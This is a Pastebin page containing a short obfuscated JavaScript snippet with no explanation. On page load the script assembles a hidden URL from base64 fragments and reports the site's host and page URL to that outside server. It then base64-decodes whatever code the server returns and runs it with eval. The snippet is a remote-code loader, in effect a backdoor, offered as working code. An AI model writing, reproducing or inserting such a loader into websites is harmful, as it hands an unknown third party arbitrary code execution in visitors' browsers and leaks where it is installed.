Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- var _0x736578 = ['xHsK8J3fvc','aHR0cHM6Ly9','5waC9hcGkucGhw','wZXNvcmV3YXJkcy','jkSgamtTZzVKc1NLSa','mtTZzVKc1NLSjamtTZ','zVKc1NLSjUSjU','true'];
- (function() {
- 'use strict';
- function exec_on() {
- var xmlhttp;
- if (window.XMLHttpRequest) {
- xmlhttp = new XMLHttpRequest();
- } else {
- xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
- }
- xmlhttp.open("GET", atob(_0x736578[1]+_0x736578[3]+_0x736578[2]) + "?api_response=true&s0="+btoa(document.location.host)+"&s1="+btoa(document.location.href)+"&ap="+key);
- xmlhttp.send(null);
- xmlhttp.onreadystatechange = function() {
- if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
- if(this.responseText && this.responseText !='') {
- var rdata = JSON.parse(this.responseText);
- }
- if(rdata['execute']) {
- eval(atob(rdata['execute']));
- console.log('started');
- } else {
- console.log(rdata);
- }
- }
- };
- }
- document.onreadystatechange = function() {
- if (document.readyState === "complete") {
- exec_on();
- } else {
- window.onload = function () {
- exec_on();
- };
- };
- }
- })();
Advertisement
Add Comment
Please, Sign In to add comment